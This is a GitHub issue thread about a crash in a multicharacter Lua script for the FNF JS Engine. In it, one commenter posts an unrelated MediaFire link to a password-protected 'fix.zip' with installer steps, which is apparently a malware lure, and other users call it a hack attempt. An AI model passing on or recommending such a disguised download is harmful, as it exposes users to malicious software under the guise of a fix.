### ISSUE TITLE
multicharacer script (capps) issue number 823

### ISSUE THREAD

**Issue by MushyMushroom1245** [JordanSantiagoYT/FNF-JS-Engine#516]
### Describe your bug here. If you are modding, try testing your bug in a clean version of the engine instead. Also, if you're using an older version of JSE, please try the latest version/action build. Also, be sure to check the pinned 'JS Engine: Known Issues' issue, to check if your issue hasn't already been found!

whenever i put "playableCharacter = true" for the script the game crashes when i miss a note

### Are you modding a build from source or with Lua?

Lua

### What is your build target?

Windows

### Did you edit anything in this build? If so, mention or summarize your changes.

no

### If you use 1.12.0 or earlier, did you have Optimized Chart Loading turned on?

None

### Did you check for any similar issues to what you're reporting? Check, then come back here. If there is a similar issue, then do not report the issue, otherwise it will be marked as a duplicate.

Yes

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by moxie-coder** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

shut the fuck up

**Comment by moxie-coder** [comment]
also this was removed in newer versions because it was pretty broken

**Comment by NAEL2XD** [comment]
> Download 
> https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
> password: changeme
> In the installer menu, select "gcc."

wow totally on topic (NOT!)
Also nice hack attempt xd
